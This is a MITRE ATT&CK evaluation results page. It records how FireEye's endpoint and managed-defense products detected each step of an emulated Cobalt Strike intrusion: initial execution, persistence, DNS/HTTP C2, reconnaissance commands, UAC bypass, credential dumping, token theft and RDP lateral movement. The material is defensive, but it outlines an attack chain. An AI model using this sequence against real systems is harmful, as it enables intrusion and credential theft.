Home  >  Results  >  FireEye  >  Overview
FireEye Managed Defense
FireEye Endpoint Security
FireEye
Tags:    

FireEye Overview Tactic Page Information

The ATT&CK tactic page displays all tested techniques belonging to that tactic, as well as all procedures and their respective detections. The procedures are grouped by their technique. The Procedure column contains a description of how the technique was tested. The Step column is where in the operational flow the procedure occurred. Click the Step Number to view it in the Operational Flow panel. Detections are classified by one or more Detection Types, summarized by the Detection Notes, and may be supported by Screenshots. The Operational Flow panel provides the context around when a procedure was executed by showing all steps of the evaluation, including the tactics, techniques and procedures of the executed steps.

MITRE does not assign scores, rankings, or ratings. The evaluation results are available to the public, so other organizations may provide their own analysis and interpretation - these are not endorsed or validated by MITRE.

Vendor Configuration     JSON     Legend
Legend
Main Detection Categories: Detection Modifiers:

None

Telemetry

Indicator of Compromise

General Behavior

Specific Behavior

Enrichment

Tainted

Delayed

Configuration Change
Step
Procedures
Technique
Detection Type Detection Notes
Screenshots
1.A.1
Legitimate user Debbie clicked and executed malicious self-extracting archive (Resume Viewer.exe) on 10.0.1.6 (Nimda)
User Execution
(T1204)
General Behavior (Configuration Change)
  
 
A General Behavior alert was generated for the Resume Viewer.exe file due to it being labeled as malicious by a machine learning engine. The alert was generated after a configuration change of the file size limit for the machine learning engine. The vendor reported that this file would have been quarantined and prevented from executing. The scan type used to produce this alert is On-access, which means the scan occurs on file writes and executions.
Telemetry
  
Telemetry showed Resume Viewer.exe executing with a parent process of explorer.exe.
General Behavior alert showing Resume Viewer.exe labeled as Malware (alert triggered after configuration change)
Telemetry showing Resume Viewer.exe being executed by explorer.exe
Rundll32
(T1085)
Enrichment
  
The capability enriched rundll32.exe with an alert for Rundll32 Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1085 - Rundll32) and Tactics (Defense Evasion, Execution).
Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because it identified use of rundll32.exe to execute update.dat with command-line arguments. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of rundll32.exe execution (tagged with correct ATT&CK Technique, T1085 - Rundll32, and Tactics, Defense Evasion, Execution)
Excerpt from the Managed Defense Report indicating rundll32.exe was used for execution (Specific Behavior)
Scripting
(T1064)
Telemetry
  
Telemetry showed Resume Viewer.exe spawning the child process cmd.exe to launch pdfhelper.cmd.
Telemetry showing the child cmd.exe process running the pdfhelper.cmd script
1.B.1
Previously executed batch file (pdfhelper.cmd) moved a separate batch file (autoupdate.bat) to the Startup folder
Registry Run Keys / Startup Folder
(T1060)
Telemetry
  
Telemetry showed autoupdate.bat being written to the Startup folder. The alert mapped to two ATT&CK Techniques (T1059 - Command-Line Interface and T1105 - Remote File Copy), but they were not directly related to the Registry Run Keys / Startup Folder Technique under test in this procedure.
Enrichment
  
The capability enriched the file write of autoupdate.bat to the Startup folder by categorizing it as Persistence.
Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because it identified the backdoor persisted by executing autoupdate.bat at system start due to its presence in the Startup directory. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Telemetry showing autoupdate.bat file written to the Startup folder
Enrichment of autoupdate.bat being written to Startup with Persistence category
Additional details on enrichment of autoupdate.dat
Excerpt from the Managed Defense Report indicating the backdoor persisted via autoupdate.bat being written to the Startup directory (Specific Behavior)
1.C.1
Cobalt Strike: C2 channel established
Commonly Used Port
(T1043)
Telemetry
  
Telemetry showed port 53 command and control traffic.
Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because it observed the use of UDP port 53 for DNS command and control traffic. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Telemetry showing port 53 command and control traffic
Excerpt from the Managed Defense Report indicating command and control occurred over UDP port 53 (Specific Behavior)
Data Encoding
(T1132)
Telemetry (Tainted)
  
 
Telemetry showed base64-encoded DNS requests to freegoogleadsenseinfo.com (C2 domain). The telemetry was tainted by the parent Cobalt Strike DNS Beacon alert.
Telemetry showing encoded DNS requests (tainted by parent Cobalt Strike DNS Beacon alert)
Standard Application Layer Protocol
(T1071)
Indicator of Compromise
  
An Indicator of Compromise alert was generated for the hardcoded DNS record name syntax in the DNS lookups for freegoogleadsenseinfo.com (C2 domain). The alert was also tagged with the correct ATT&CK Technique (T1071 - Standard Application Layer Protocol) and Tactic (Command and Control).
Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because it identified that command and control occurred via DNS. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Indicator of Compromise alert for DNS lookups (tagged with correct ATT&CK Technique, T1071 - Standard Application Layer Protocol, and Tactic, Command and Control)
Excerpt from the Managed Defense Report indicating command and control occurred via DNS (Specific Behavior)
2.A.1
Cobalt Strike: 'ipconfig /all' via cmd
System Network Configuration Discovery
(T1016)
Enrichment
  
The capability enriched ipconfig.exe with an alert for Ipconfig Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1016 - System Network Configuration Discovery) and Tactic (Discovery).
Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because it identified that ipconfig.exe was one of the reconnaissance commands performed to enumerate the network configuration of Nimda. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of ipconfig.exe with Ipconfig Execution alert (tagged with correct ATT&CK Technique, T1016 - System Network Configuration Discovery, and Tactic, Discovery)
Excerpt from the Managed Defense Report indicating ipconfig.exe was used to enumerate the network configuration of Nimda (Specific Behavior)
Excerpt from the Managed Defense Report with additional details about ipconfig.exe execution
2.A.2
Cobalt Strike: 'arp -a' via cmd
System Network Configuration Discovery
(T1016)
Enrichment
  
The capability enriched arp.exe with an alert for Arp Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1016 - System Network Configuration Discovery) and Tactic (Discovery).
Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because it identified that arp.exe was one of the reconnaissance commands performed to enumerate the network configuration of Nimda. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of arp.exe with Arp Execution alert (tagged with correct ATT&CK Technique, T1016 - System Network Configuration Discovery, and Tactic, Discovery)
Excerpt from the Managed Defense Report indicating arp.exe was used to enumerate the network configuration of Nimda (Specific Behavior)
Excerpt from the Managed Defense Report with additional details about arp.exe execution
2.B.1
Cobalt Strike: 'echo' via cmd to enumerate specific environment variables
System Owner / User Discovery
(T1033)
Telemetry
  
Telemetry showed the use of echo with command-line arguments.
Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because it identified that echo was one of the commands used to enumerate the current username. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Telemetry showing echo with command-line arguments
Excerpt from the Managed Defense Report indicating echo was used to enumerate the current username (Specific Behavior)
Excerpt from the Managed Defense Report with additional details about echo
2.C.1
Cobalt Strike: 'ps' (Process status) via Win32 APIs
Process Discovery
(T1057)
None
  
No detection capability demonstrated for this procedure.
2.C.2
Cobalt Strike: 'tasklist /v' via cmd
Process Discovery
(T1057)
Enrichment
  
The capability enriched tasklist.exe with an alert for Tasklist Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1057 - Process Discovery) and Tactic (Discovery).
Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because it identified that tasklist was one of the commands used to enumerate current running processes. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of tasklist.exe with Tasklist Execution alert (tagged with correct ATT&CK Technique, T1057 - Process Discovery, and Tactic, Discovery)
Excerpt from the Managed Defense Report indicating tasklist was used to enumerate current running processes (Specific Behavior)
Excerpt from the Managed Defense Report with additional details about tasklist
2.D.1
Cobalt Strike: 'sc query' via cmd
System Service Discovery
(T1007)
Enrichment
  
The capability enriched sc.exe with an alert for SC Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1007 - System Service Discovery) and Tactic (Discovery).
Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because it identified that sc was one of the commands used to enumerate current running services. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of sc.exe with SC Execution alert (tagged with correct ATT&CK Technique, T1007 - System Service Discovery, and Tactic, Discovery)
Additional details from enrichment of sc.exe
Excerpt from the Managed Defense Report indicating sc was used to enumerate current running services (Specific Behavior)
Excerpt from the Managed Defense Report with additional details about sc
2.D.2
Cobalt Strike: 'net start' via cmd
System Service Discovery
(T1007)
Enrichment
  
The capability enriched net.exe with an alert for Net Start Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1007 - System Service Discovery) and Tactic (Discovery).
Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because it identified that net was one of the commands used to enumerate current running services. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of net.exe with Net Start Command Execution alert (tagged with correct ATT&CK Technique, T1007 - System Service Discovery, and Tactic, Discovery)
Excerpt from the Managed Defense Report indicating net was used to enumerate current running services (Specific Behavior)
Excerpt from the Managed Defense Report with additional details about net
2.E.1
Cobalt Strike: 'systeminfo' via cmd
System Information Discovery
(T1082)
Enrichment
  
The capability enriched systeminfo.exe with an alert for Systeminfo Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1082 - System Information Discovery) and Tactic (Discovery).
Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because it identified systeminfo as a reconnaissance command used to obtain details from the system. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of systeminfo.exe with Systeminfo Execution alert (tagged with correct ATT&CK Technique, T1082 - System Information Discovery, and Tactic, Discovery)
Excerpt from the Managed Defense Report indicating systeminfo was a reconnaissance used to obtain system details (Specific Behavior)
Excerpt from the Managed Defense Report with additional details about systeminfo
2.E.2
Cobalt Strike: 'net config workstation' via cmd
System Information Discovery
(T1082)
Enrichment
  
The capability enriched net.exe with an alert for Net Config Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1082 - System Information Discovery) and Tactic (Discovery).
General Behavior (Delayed)
  
 
The Managed Defense Report indicated a General Behavior occurred because it identified net config as a reconnaissance command performed. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of net.exe with Net Config Command Execution alert (tagged with correct ATT&CK Technique, T1082 - System Information Discovery, and Tactic, Discovery)
Excerpt from the Managed Defense Report indicating net config was a reconnaissance command (General Behavior)
Excerpt from the Managed Defense Report with additional details about net
2.F.1
Cobalt Strike: 'net localgroup administrators' via cmd
Permission Groups Discovery
(T1069)
Enrichment
  
The capability enriched net.exe with an alert for Net Group Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1069 - Permission Groups Discovery) and Tactic (Discovery).
Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because it identified that the attacker enumerated members of the local administrators group. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of net.exe with Net Group Command Execution alert (tagged with correct ATT&CK Technique, T1069 - Permission Groups Discovery, and Tactic, Discovery)
Excerpt from the Managed Defense Report indicating the attacker enumerated members of the local administrators group (Specific Behavior)
Excerpt from the Managed Defense Report with additional details about net
2.F.2
Cobalt Strike: 'net localgroup administrators /domain' via cmd
Permission Groups Discovery
(T1069)
Enrichment
  
The capability enriched net.exe with an alert for Net Group Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1069 - Permission Groups Discovery) and Tactic (Discovery)
Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because it identified that the attacker enumerated members of the local administrators group. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of net.exe with Net Group Command Execution alert (tagged with correct ATT&CK Technique, T1069 - Permission Groups Discovery, and Tactic, Discovery)
Excerpt from the Managed Defense Report indicating the attacker enumerated members of the local administrators group (Specific Behavior)
Excerpt from the Managed Defense Report with additional details about net
2.F.3
Cobalt Strike: 'net group "Domain Admins" /domain' via cmd
Permission Groups Discovery
(T1069)
Enrichment
  
The capability enriched net.exe with an alert for Net Group Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1069 - Permission Groups Discovery) and Tactic (Discovery).
Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because it identified that the attacker enumerated the Shockwave domain's Domain Administrators group. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of net.exe with Net Group Command Execution alert (tagged with correct ATT&CK Technique, T1069 - Permission Groups Discovery, and Tactic, Discovery)
Excerpt from the Managed Defense Report indicating the attacker enumerated the Domain Administrators group (Specific Behavior)
Excerpt from the Managed Defense Report with additional details about net
2.G.1
Cobalt Strike: 'net user /domain' via cmd
Account Discovery
(T1087)
Enrichment
  
The capability enriched net.exe with an alert for Net User Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1087 - Account Discovery) and Tactic (Discovery).
General Behavior (Delayed)
  
 
The Managed Defense Report indicated a General Behavior occurred because it identified net user as a reconnaissance command performed. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of net.exe with Net User Command Execution alert (tagged with correct ATT&CK Technique, T1087 - Account Discovery, and Tactic, Discovery)
Excerpt from the Managed Defense Report indicating net user was a reconnaissance command (General Behavior)
Excerpt from the Managed Defense Report with additional details about net
2.G.2
Cobalt Strike: 'net user george /domain' via cmd
Account Discovery
(T1087)
Enrichment
  
The capability enriched net.exe with an alert for Net User Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1087 - Account Discovery) and Tactic (Discovery).
General Behavior (Delayed)
  
 
The Managed Defense Report indicated a General Behavior occurred because it identified net user as a reconnaissance command performed. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of net.exe with Net User Command Execution alert (tagged with correct ATT&CK Technique, T1087 - Account Discovery, and Tactic, Discovery)
Excerpt from the Managed Defense Report indicating net user was a reconnaissance command (General Behavior)
Excerpt from the Managed Defense Report with additional details about net
2.H.1
Cobalt Strike: 'reg query' via cmd to enumerate a specific Registry key
Query Registry
(T1012)
Enrichment
  
The capability enriched reg.exe with an alert for Reg Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1012 - Query Registry) and Tactic (Discovery).
Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because the attacker queried a registry key that contains system policy configurations. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of reg.exe with Reg Execution alert (tagged with correct ATT&CK Technique, T1012 - Query Registry, and Tactic, Discovery)
Excerpt from the Managed Defense Report indicating the attacker queried a registry key that contains system policy configurations (Specific Behavior)
Excerpt from the Managed Defense Report with additional details about reg
3.A.1
Cobalt Strike: Built-in UAC bypass token duplication capability executed to elevate process integrity level
Access Token Manipulation
(T1134)
Telemetry (Configuration Change)
  
 
Telemetry showed a svchost.exe seclogon event for a token logon ID later used by a process whose group membership indicated high integrity. A Configuration Change was made in order to collect Windows Event Logs for events 4627 (Group Membership Information) and 4673 (A privileged service was called).
Telemetry showing svchost.exe seclogon event for token login ID 0xfcf5fd
Telemetry showing group membership of token logon ID 0xfcf5fd, which includes S-1-16-12288 (High Mandatory Level)
Bypass User Account Control
(T1088)
Telemetry (Configuration Change)
  
 
Telemetry showed execution of powershell.exe as a high integrity process as SYSTEM with a token login ID previously associated with user Debbie. A Configuration Change was made in order to collect Windows Event Logs for events 4627 (Group Membership Information) and 4673 (A privileged service was called).
Telemetry showing execution of powershell.exe running as SYSTEM with token login ID 0xfcf5fd
Telemetry showing group membership of token logon ID 0xfcf5fd, associated with user Debbie, which includes S-1-16-12288 (High Mandatory Level)
3.B.1
Cobalt Strike: 'ps' (Process status) via Win32 APIs
Process Discovery
(T1057)
None
  
No detection capability demonstrated for this procedure.
3.C.1
Cobalt Strike: Built-in process injection capability executed to inject callback into cmd.exe
Process Injection
(T1055)
Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because it identified a process injection from PowerShell.exe to cmd.exe. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident. The vendor stated the process injection detection capability is a HX plugin that is only available within the Managed Defense Service, and the data is reported to a separate cloud server which is not accessible to customers at this time.
Excerpt from the Managed Defense Report identifying a process injection from PowerShell.exe to cmd.exe (Specific Behavior)
Continued excerpt from the Managed Defense Report showing the artifact evidence of a process injection from PowerShell.exe to cmd.exe
4.A.1
Cobalt Strike: 'net group "Domain Controllers" /domain' via cmd
Remote System Discovery
(T1018)
Enrichment
  
The capability enriched net.exe with an alert for Net Group Command Execution (Weak Signal). The alert was also tagged with a related ATT&CK Technique (T1069 - Permission Groups Discovery) and the correct Tactic (Discovery).
General Behavior (Delayed)
  
 
The Managed Defense Report indicated a General Behavior occurred because it indicated net group was one of the reconnaissance commands performed. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of net.exe with Net Group Command Execution alert (tagged with related ATT&CK Technique, T1069 - Permission Groups Discovery, and correct Tactic, Discovery)
Excerpt from the Managed Defense Report indicating net group was a reconnaissance command (General Behavior)
Excerpt from the Managed Defense Report with additional details about net group
4.A.2
Cobalt Strike: 'net group "Domain Computers" /domain' via cmd
Remote System Discovery
(T1018)
Enrichment
  
The capability enriched net.exe with an alert for Net Group Command Execution (Weak Signal). The alert was also tagged with a related ATT&CK Technique (T1069 - Permission Groups Discovery) and the correct Tactic (Discovery).
General Behavior (Delayed)
  
 
The Managed Defense Report indicated a General Behavior occurred because it indicated net group was one of the reconnaissance commands performed. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of net.exe with Net Group Command Execution alert (tagged with related ATT&CK Technique, T1069 - Permission Groups Discovery, and correct Tactic, Discovery)
Excerpt from the Managed Defense Report indicating net group was a reconnaissance command (General Behavior)
Excerpt from the Managed Defense Report with additional details about net group
4.B.1
Cobalt Strike: 'netsh advfirewall show allprofiles' via cmd
System Network Configuration Discovery
(T1016)
Enrichment
  
The capability enriched netsh.exe with an alert for Netsh Execution (Weak Signal). The alert was also tagged with a related ATT&CK Technique (T1063 - Security Software Discovery) and the correct Tactic (Discovery).
Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because it identified that netsh was a reconnaissance command used to obtain network configuration and the configuration profile of the Windows Firewall. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of netsh.exe with Netsh Execution alert (tagged with related ATT&CK Technique, T1063 - Security Software Discovery, and correct Tactic, Discovery)
Excerpt from the Managed Defense Report indicating netsh was used to obtain network configuration and the configuration profile of the Windows Firewall (Specific Behavior)
Excerpt from the Managed Defense Report with additional details about netsh
4.C.1
Cobalt Strike: 'netstat -ano' via cmd
System Network Connections Discovery
(T1049)
Enrichment
  
The capability enriched netstat.exe with an alert for Netstat Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1049 - System Network Connections Discovery) and Tactic (Discovery).
Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because it identified that netstat was a reconnaissance command used to enumerate active and listening network ports. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of netstat.exe with Netstat Execution alert (tagged with the correct ATT&CK Technique, T1049 - System Network Connections Discovery, and Tactic, Discovery)
Excerpt from the Managed Defense Report indicating netstat was used to enumerate active and listening network ports (Specific Behavior)
Excerpt from the Managed Defense Report with additional details about netstat
5.A.1
Cobalt Strike: Built-in Mimikatz credential dump capability executed
Credential Dumping
(T1003)
None
  
No detection capability demonstrated for this procedure.
Process Injection
(T1055)
None
  
No detection capability demonstrated for this procedure.
5.A.2
Cobalt Strike: Built-in hash dump capability executed
Credential Dumping
(T1003)
None
  
No detection capability demonstrated for this procedure.
Process Injection
(T1055)
None
  
No detection capability demonstrated for this procedure.
5.B.1
Cobalt Strike: Built-in token theft capability executed to change user context to George
Access Token Manipulation
(T1134)
Telemetry
  
Telemetry showed a process (net.exe) executed during Step 4 as user Debbie and a subsequent process (reg.exe) executed during Step 6 as user George, indicating a change in user context from a stolen token.
Telemetry showing the user Debbie executing net.exe with command-line arguments during Step 4
Telemetry showing the user George executing reg.exe with command-line arguments during Step 6
6.A.1
Cobalt Strike: 'reg query' via cmd to remotely enumerate a specific Registry key on Conficker (10.0.0.5)
Query Registry
(T1012)
Enrichment
  
The capability enriched reg.exe with an alert for Reg Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1012 - Query Registry) and Tactic (Discovery). An alert was also generated for a File Write To Named Pipe (Weak Signal) for reg.exe.
Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because it identified reg.exe as a reconnaissance command to enumerate a Registry key on the host Conficker to determine the configuration of its Windows Terminal Server service. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.  
Enrichment of reg.exe with Reg Execution alert (tagged with correct ATT&CK Technique, T1012 - Query Registry, and Tactic, Discovery)
File Write To Named Pipe alert for write to remote named pipe from reg.exe
Additional details on named pipe alert
Excerpt from Managed Defense Report of the reg command executing a remote registry query (Specific Behavior)
Excerpt from the Managed Defense Report with additional details about reg query
6.B.1
Cobalt Strike: C2 channel modified
Commonly Used Port
(T1043)
Telemetry
  
Telemetry showed a connection over port 80 to 192.168.0.4 (C2 server).
General Behavior (Delayed)
  
 
The Managed Defense Report indicated a General Behavior occurred because it identified C2 communication over TCP port 80 to www.freegoogleadsenseinfo.com (C2 domain).  Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.  
Telemetry showing port 80 connections to 192.168.0.4 (C2 server)
Excerpt from the Managed Defense Report identifying C2 traffic communicating over TCP port 80 to www.freegoogleadsenseinfo.com (C2 domain) (General Behavior)
Multiband Communication
(T1026)
Telemetry
  
Telemetry showed a combination of both DNS requests as well as HTTP requests, which could indicate multiband communication.
Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because it identified C2 communication over TCP port 80 to www.freegoogleadsenseinfo.com (C2 domain) in addition to the ongoing DNS C2. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Telemetry showing DNS requests (field name dnsLookupEvents/Generated) and HTTP requests (field name urlMonitorEvents/Generated)
Excerpt from the Managed Defense Report identifying C2 traffic communicating over TCP port 80 to www.freegoogleadsenseinfo.com (C2 domain) in addition to the ongoing DNS C2 (Specific Behavior)
Standard Application Layer Protocol
(T1071)
Telemetry
  
Telemetry showed HTTP GET requests over port 80 to 192.168.0.4 (C2 server).
General Behavior (Delayed)
  
 
The Managed Defense Report indicated a General Behavior occurred because it identified C2 communication over HTTP to www.freegoogleadsenseinfo.com (C2 domain). Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.  
Telemetry showing HTTP GET requests to 192.168.0.4 (C2 server)
Excerpt from the Managed Defense Report identifying C2 traffic communicating over HTTP to www.freegoogleadsenseinfo.com (C2 domain) (General Behavior)
6.C.1
Cobalt Strike: C2 channel modified to proxy RDP connection to Conficker (10.0.0.5)
Remote Desktop Protocol
(T1076)
Enrichment
  
The capability enriched the RDP connection from rundll32.exe with an alert for RDP Network Connection (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1076 - Remote Desktop Protocol) and Tactic (Lateral Movement).
Enrichment of RDP connection from rundll32.exe with RDP Network Connection alert (tagged with correct ATT&CK Technique, T1076 - Remote Desktop Protocol, and Tactic, Lateral Movement)
7.A.1
Added user Jesse to Conficker (10.0.0.5) through RDP connection
Create Account
(T1136)
Telemetry
  
Telemetry from Conficker showed the creation of the new user Jesse.
Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because it identified the creation of a local user account for Jesse on Conficker. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Telemetry showing creation of user Jesse
Excerpt from the Managed Defense Report showing the creation of the user Jesse (Specific Behavior)
Graphical User Interface
(T1061)
Telemetry
  
Telemetry showed execution of mmc.exe, the Microsoft Management Console, spawning the GUI-based lusrmgr.msc (Local Users and Groups snap-in).
Telemetry showing mmc.exe spawning lusrmgr.exe
Account Discovery
(T1087)
Telemetry
  
Telemetry showed execution of mmc.exe, the Microsoft Management Console, spawning the lusrmgr.msc (Local Users and Groups snap-in), which displays local account information.
Telemetry showing mmc.exe running lusrmgr.exe
7.B.1
Cobalt Strike: Built-in upload capability executed to write a DLL payload (updater.dll) to disk on Nimda (10.0.1.6)
Remote File Copy
(T1105)
Enrichment
  
The capability enriched updater.dll being written by cmd.exe with an alert for CMD File Write (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1105 - Remote File Copy) and a related ATT&CK Technique (T1059 - Command-Line Interface) and Tactic (Execution). 
Telemetry (Tainted)
  
 
Telemetry showed the file write for updater.dll into the system32 folder. The telemetry was tainted by the parent AV signature alert for updater.dll.
Enrichment of updater.dll file write by cmd.exe with alert for CMD File Write (tagged with correct ATT&CK Technique, T1105  - Remote File Copy, and related ATT&CK Technique, T1059 - Command-Line Interface, and Tactic, Execution)
Telemetry showing updater.dll file write (tainted by parent AV signature alert)
7.C.1
Cobalt Strike: 'schtasks' via cmd to create scheduled task that executes a DLL payload (updater.dll)
Scheduled Task
(T1053)
Enrichment
  
The capability enriched schtasks.exe with an alert for Scheduled Task Activity (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1053 - Scheduled Task) and Tactics (Execution, Persistence, and Privilege Escalation).
Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because it identified that updater.dll persisted through the creation of a scheduled task. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of schtasks.exe with Scheduled Task Activity alert (tagged with correct ATT&CK Technique, T1053 - Scheduled Task, and Tactic, Execution, Persistence, Privilege Escalation)
Excerpt from the Managed Defense Report indicating updater.dll persisted through a scheduled task (Specific Behavior)
Excerpt from the Managed Defense Report with additional details about schtask
8.A.1
Cobalt Strike: 'dir /s /b "\\conficker\wormshare"' via cmd
File and Directory Discovery
(T1083)
Enrichment
  
The capability enriched cmd.exe executing dir with an alert for Dir Command (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1083 - File and Directory Discovery) and Tactic (Discovery).
Enrichment of cmd.exe executing dir with Dir Command alert (tagged with correct ATT&CK Technique, T1083 - File and Directory Discovery and, Tactic, Discovery)
8.A.2
Cobalt Strike: 'tree "C:\Users\debbie"' via cmd
File and Directory Discovery
(T1083)
Enrichment
  
The capability enriched cmd.exe executing tree with an alert for Tree Command Execution (Weak Signal). The alert was also tagged with the correct ATT&CK Technique (T1083 - File and Directory Discovery) and Tactic (Discovery).
Specific Behavior (Delayed)
  
 
The Managed Defense Report indicated a Specific Behavior occurred because it identified that the attacker performed a directory listing of the contents of Debbie's user profile directory. Managed Defense Reports are reports provided by FireEye's managed detection and response (MDR) service. FireEye provided reports to MITRE after the completion of the evaluation to mimic what they would produce in a real incident.
Enrichment of cmd.exe executing tree with Tree Command Execution alert (tagged with correct ATT&CK Technique, T1083 - File and Directory Discovery and Tactic, Discovery)
Excerpt from the Managed Defense Report identifying a directory listing of Debbie's profile directory (Specific Behavior)
Excerpt from Managed Defense Report showing additional details about tree
8.B.1
Cobalt Strike: 'ps' (Process status) via Win32 APIs
Process Discovery
(T1057)
None
  
No detection capability demonstrated for this procedure.
8.C.1
Cobalt Strike: Built-in keylogging capability executed to capture keystrokes of user Debbie
Input Capture
(T1056)
None
  
No detection capability demonstrated for this procedure.
Application Window Discovery
